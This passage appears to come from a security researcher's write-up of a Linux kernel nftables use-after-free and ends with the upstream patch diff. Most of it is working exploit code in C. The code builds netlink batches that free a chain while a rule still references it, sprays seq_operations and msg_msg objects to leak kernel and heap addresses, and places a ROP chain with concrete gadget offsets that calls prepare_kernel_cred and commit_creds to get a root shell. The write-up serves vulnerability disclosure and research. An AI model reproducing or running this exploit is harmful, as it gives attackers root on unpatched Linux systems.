struct nftnl_rule *r = build_rule(table_name, "chain2", family, NULL);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
// Add immediate expr to rule
struct nftnl_expr *e = nftnl_expr_alloc("immediate");
nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_CHAIN_ID, 0x1234);
nftnl_rule_add_expr(r, e);
nftnl_rule_nlmsg_build_payload(nlh, r);
mnl_nlmsg_batch_next(batch);
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Send netlink message
printf("[+] Sending netlink message 1\n");
ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch));
if (ret == -1) {
perror("mnl_socket_sendto");
exit(EXIT_FAILURE);
}
mnl_nlmsg_batch_stop(batch);
As all the actions in the first batch transaction are valid, commit is called, and the transaction worker which destroys inactive objects is scheduled.
The second batch transaction consists of the following operations:
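1. Delete the rule created in the first batch (NFT_MSG_DELRULE)
2. Add an invalid rule so that the batch fails (NFT_MSG_NEWRULE)
// Start nl message 2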
batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Delete rule 1
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_rule_nlmsg_build_payload(nlh, r);
mnl_nlmsg_batch_next(batch);
// Fail the batch using a invalid rule
struct nftnl_rule *r2 = nftnl_rule_alloc();
nftnl_rule_set_u32(r2, NFTNL_RULE_FAMILY, NFPROTO_IPV4);
nftnl_rule_set_str(r2, NFTNL_RULE_TABLE, table_name);
nftnl_rule_set_str(r2, NFTNL_RULE_CHAIN, "chain2");
struct xt_audit_info *audit_info;
audit_info = malloc(sizeof(struct xt_audit_info));
audit_info->type = 0xff; <-- [7]
struct nftnl_expr *e2 = nftnl_expr_alloc("target");
nftnl_expr_set_str(e2, NFTNL_EXPR_TG_NAME, "AUDIT");
nftnl_expr_set_u32(e2, NFTNL_EXPR_TG_REV, 0);
nftnl_expr_set_data(e2, NFTNL_EXPR_TG_INFO, audit_info, sizeof(struct xt_audit_info));
nftnl_rule_add_expr(r2, e2);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_rule_nlmsg_build_payload(nlh, r2);
mnl_nlmsg_batch_next(batch);
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Send netlink message 2
printf("[+] Sending netlink message 2\n");
ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch));
if (ret == -1) {
perror("mnl_socket_sendto");
exit(EXIT_FAILURE);
}
mnl_nlmsg_batch_stop(batch);
As the second batch transaction fails, commit will not be called. However, nftables netlink messages were still passed to nftables, and operations in the control plane will still be performed (they will be aborted at the very end when the batch transaction fails).
As NFT_MSG_DELRULE
was passed to nftables, the following code path is taken:
nf_tables_delrule
-> nft_delrule_by_chain
-> nft_delrule
-> nft_rule_expr_deactivate
-> nft_immediate_deactivate
-> nft_data_release
-> nft_verdict_uninit
Specifically, in nft_verdict_uninit
, chain->use of the referenced chain (which in this case would be our target chain “AAAAAAAAAAAAAAAAAAAA”) will be decremented from 1 to 0.
static void nft_verdict_uninit(const struct nft_data *data)
{
struct nft_chain *chain;
struct nft_rule *rule;
switch (data->verdict.code) {
case NFT_JUMP:
case NFT_GOTO:
chain = data->verdict.chain;
chain->use--;
...
Essentially, chain->use of the target chain must be decremented to 0 before the transaction worker nf_tables_trans_destroy_work
runs, and the transaction worker must run before the failed batch transaction is aborted.
If the rule is marked for deletion before nf_tables_chain_destroy
is called, chain->use of the target chain will be 0 when the chain is destroyed, allowing the chain to be freed. As seen in the function code previously, the chain is freed in the order chain->name
, chain->udata
, and chain
. The struct nft_chain
object has been freed, but we still have a reference to the freed chain via the rule (which is not actually deleted because the second transaction fails), resulting in a use-after-free. The space that chain, chain->name and chain->udata originally occupied can now be reclaimed with other objects to aid us in our exploitation.
Before going into how to obtain a leak, it is important to understand how and where the chain, chain->udata and chain->name objects are allocated.
The struct nft_chain
object is allocated when nftables receives a NFT_MSG_NEWCHAIN
message. In the control plane, nf_tables_newchain
calls nf_tables_addchain
, which allocates the new chain object in the kmalloc-cg-128
cache. chain->udata and chain->name are allocated in their respective kmalloc-cg
caches by nla_memdup
and nla_strdup
respectively.
static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
u8 policy, u32 flags,
struct netlink_ext_ack *extack)
{
...
chain = kzalloc(sizeof(*chain), GFP_KERNEL_ACCOUNT);
if (chain == NULL)
return -ENOMEM;
...
if (nla[NFTA_CHAIN_NAME]) {
chain->name = nla_strdup(nla[NFTA_CHAIN_NAME], GFP_KERNEL_ACCOUNT);
} else {
if (!(flags & NFT_CHAIN_BINDING)) {
err = -EINVAL;
goto err_destroy_chain;
}
snprintf(name, sizeof(name), "__chain%llu", ++chain_id);
chain->name = kstrdup(name, GFP_KERNEL_ACCOUNT);
}
...
if (nla[NFTA_CHAIN_USERDATA]) {
chain->udata = nla_memdup(nla[NFTA_CHAIN_USERDATA], GFP_KERNEL_ACCOUNT);
if (chain->udata == NULL) {
err = -ENOMEM;
goto err_destroy_chain;
}
chain->udlen = nla_len(nla[NFTA_CHAIN_USERDATA]);
}
It is possible to leak data via reading from chain->name. However, as chain->name is treated as a string, it is only possible to print data up to a null byte.
To obtain a kernel text leak, struct seq_operations
was chosen as the spray object. In kernel version 6.2.0, struct seq_operations
is allocated in the kmalloc-cg-32
cache by the function single_open
in fs/seq_file.c. This object is perfect for leaking as it contains a kernel text pointer (the address of the single_start
function).
/*
 * Callback table consisting of four function pointers. The start callback is
 * the first member, so it sits at offset 0 of the object.
 */
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};
struct seq_operations
was sprayed to reclaim the freed space originally occupied by chain->name [8]. chain->name was then read to obtain a text leak, which can be used to calculate the kernel base [9].
// Spray seq_operations to fill up kmalloc-cg-32 (chain->name)
printf("[+] Spray seq_operations to fill up kmalloc-cg-32 chain->name\n");
for (int i = 0; i < NUM_SEQOPS; i++) {
seqops[i] = open("/proc/self/stat", O_RDONLY); <-- [8]
if (seqops[i] < 0) {
perror("[!] open");
exit(-1);
}
}
// Get kernel text address leak of single_start and calculate kbase
char kbase_leak[0x10+1];
uint64_t k_single_start = 0; // 0x4b2470 offset
uint64_t kbase = 0;
int err = 0;
printf("[+] Getting leak\n");
// Leak
struct nftnl_rule *rleak = nftnl_rule_alloc();
nftnl_rule_set_u32(rleak, NFTNL_RULE_FAMILY, NFPROTO_IPV4);
nftnl_rule_set_str(rleak, NFTNL_RULE_TABLE, table_name);
nftnl_rule_set_str(rleak, NFTNL_RULE_CHAIN, "chain2");
rseq = seq;
nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETRULE, NFPROTO_IPV4, NLM_F_DUMP, seq++);
nftnl_rule_nlmsg_build_payload(nlh, rleak);
mnl_socket_sendto(nl, buf, nlh->nlmsg_len);
while (rseq < seq) {
err = mnl_socket_recvfrom(nl, buf, sizeof(buf));
err = mnl_cb_run(buf, err, rseq, mnl_socket_get_portid(nl), leak_cb, leak_expr_cb);
rseq += err == 0;
}
nftnl_rule_free(rleak);
kbase = number - 0x4b2470; <-- [9]
printf("[+] Kernel base: 0x%llx\n", kbase);
Ideally, to have enough space for our fake struct nft_rule
, struct nft_expr
and struct nft_expr_ops
, we would like to have a kmalloc-cg-1024 heap leak (where we can allocate the struct msg_msg
which contains all our fake objects). However, kmalloc-cg-1024 addresses will always end with a null byte, hence preventing us from directly printing the address via chain->name.
In order to circumvent this limitation, we will spray struct msg_msg
in the following way as shown below (prev pointers are omitted for simplicity):
In a single message queue, there will be:
We will first attempt to leak a kmalloc-cg-96
pointer via the UAF read from the freed chain. chain->name would point to the next pointer of the primary message, which would be the address of the secondary message. A size of 96 bytes was chosen because kmalloc-cg-96
cache objects are small, so there is a much lower probability that the least significant byte of the address is 0x0, which would truncate our leak and cause it to fail.
After obtaining a valid kmalloc-cg-96
heap pointer, we now want to leak the kmalloc-cg-1024
heap pointer. The next pointer of the secondary message points to the third message, which is allocated in kmalloc-cg-1024
. We also know that the struct nft_chain
object (which is now freed) was allocated in kmalloc-cg-128
. To obtain the leak, we spray a fourth message of size 128 into the space of the freed chain object, and set the fake chain->name to the address of the kmalloc-cg-96
pointer + 1, so that the string read skips the null least significant byte of the kmalloc-cg-1024 pointer stored there. This is shown in the diagram below:
We can now read from chain->name to obtain a kmalloc-cg-1024
pointer.
When a new rule is added to a base chain, the following functions are called to ensure that the ruleset will not result in any loops:
nf_tables_newrule
-> nft_table_validate
-> nft_chain_validate
-> expr->ops->validate
When nft_chain_validate
is called, the expressions from the rules in the chain will be validated. nftables will use struct list_head rules
in the nft_chain
structure to determine what rules belong to the chain. However, we are able to control the space previously occupied by the freed target chain. This means that if we create a fake rule, with a fake expression and fake expression ops pointing to our ROP chain, and then spray a fake chain to reclaim the space of the freed target chain, and finally add a new rule to a base chain, we are able to kick off this chain of functions that will allow us to control RIP.
We first free the third message (size 1024) and the fourth message (size 128) which was used to leak the heap pointer. We then construct a fake rule, fake expression, fake expression ops and ROP chain in the data section of a struct msg_msg
and spray that as our third message. The fake structures and ROP chain can be seen below:
// Do all the ROP stuff in kmalloc-cg-1024
printf("[+] PHASE 3: ROP\n");
uint64_t fake_rule_addr = kheap_1024 + 0x230;
printf("[+] Fake rule address: 0x%llx\n", fake_rule_addr);
uint64_t fake_expr_addr = kheap_1024 + 0x260;
printf("[+] Fake expr ops: 0x%llx\n", fake_expr_addr);
// Make a fake rule
memset(&msg_three, 0, sizeof(msg_three));
*(long *)&msg_three.mtype = 0x43;
*(uint8_t *)&msg_three.mtext[0x215] = 0x10;
*(long *)&msg_three.mtext[0x218] = fake_expr_addr;
*(long *)&msg_three.mtext[0x278] = kbase + 0xba612a; // First rop point
// 0xffffffff81ba612a : push rsi ; jmp qword ptr [rsi - 0x7f]
// ROP!!!
*(long *)&msg_three.mtext[0x199] = kbase + 0xd58be; // Second rop point
// 0xffffffff810d58be : pop rsp ; pop r15 ; ret
*(long *)&msg_three.mtext[0x220] = kbase + 0xd58c0; // pop rdi ; ret
*(long *)&msg_three.mtext[0x228] = kbase + 0x2a1b600; // init_task
*(long *)&msg_three.mtext[0x230] = kbase + 0x126bc0; // prepare_kernel_cred()
*(long *)&msg_three.mtext[0x238] = kbase + 0xcb0f92; // pop rsi ; ret
// 0xffffffff81cb0f92 : pop rsi ; ret 0
*(long *)&msg_three.mtext[0x240] = kheap_1024 + 0x3a0 + 48 + 0x70; // rsi
*(long *)&msg_three.mtext[0x248] = kbase + 0xd287b6;
// 0xffffffff81d287b6 : push rax ; jmp qword ptr [rsi - 0x70]
// Jump point after push rax
*(long *)&msg_three.mtext[0x3a0] = kbase + 0xd58c0; // pop rdi ; ret
*(long *)&msg_three.mtext[0x250] = kbase + 0x1268e0; // commit_creds()
*(long *)&msg_three.mtext[0x258] = kbase + 0xad163; // 4 pop
*(long *)&msg_three.mtext[0x280] = kbase + 0x12011cb; // swapgs, iretq
*(long *)&msg_three.mtext[0x288] = user_rip;
*(long *)&msg_three.mtext[0x290] = user_cs;
*(long *)&msg_three.mtext[0x298] = user_rflags;
*(long *)&msg_three.mtext[0x2a0] = user_sp;
*(long *)&msg_three.mtext[0x2a8] = user_ss;
// Spray msg_msg of size 1024
for (int i = 0; i < NUM_MSQIDS; i++) {
if (msgsnd(msqid[i], &msg_three, sizeof(msg_three) - sizeof(long), 0) < 0) {
perror("[!] msg_msg spray failed");
exit(-1);
}
}
We then spray a fourth struct msg_msg
which will act as our fake chain. Shown below is a summary of the objects involved:
To kick off the ROP chain, simply add a new rule to the previously created base chain “chain2”, and enjoy your root shell!
To patch the bug, simply check the genmask when looking up a chain by its ID.
net/netfilter/nf_tables_api.c | 11 +++++++----
1 file changed, 7 insertions(+), 4 deletions(-)
diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index 9573a8fcad79..3701493e5401 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -2694,7 +2694,7 @@ static int nf_tables_updchain(struct nft_ctx *ctx, u8 genmask, u8 policy,
static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
const struct nft_table *table,
- const struct nlattr *nla)
+ const struct nlattr *nla, u8 genmask)
{
struct nftables_pernet *nft_net = nft_pernet(net);
u32 id = ntohl(nla_get_be32(nla));
@@ -2705,7 +2705,8 @@ static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
if (trans->msg_type == NFT_MSG_NEWCHAIN &&
chain->table == table &&
- id == nft_trans_chain_id(trans))
+ id == nft_trans_chain_id(trans) &&
+ nft_active_genmask(chain, genmask))
return chain;
}
return ERR_PTR(-ENOENT);
@@ -3809,7 +3810,8 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
return -EOPNOTSUPP;
} else if (nla[NFTA_RULE_CHAIN_ID]) {
- chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID]);
+ chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID],
+ genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN_ID]);
return PTR_ERR(chain);
@@ -10502,7 +10504,8 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
genmask);
} else if (tb[NFTA_VERDICT_CHAIN_ID]) {
chain = nft_chain_lookup_byid(ctx->net, ctx->table,
- tb[NFTA_VERDICT_CHAIN_ID]);
+ tb[NFTA_VERDICT_CHAIN_ID],
+ genmask);
if (IS_ERR(chain))
return PTR_ERR(chain);
} else {
Here is a demonstration of the exploit in action:
The exploit script can be obtained here
I would like to thank my mentor Billy for teaching me so many cool techniques and guiding me, Jacob for giving me this internship opportunity, and everyone else at STAR Labs! :D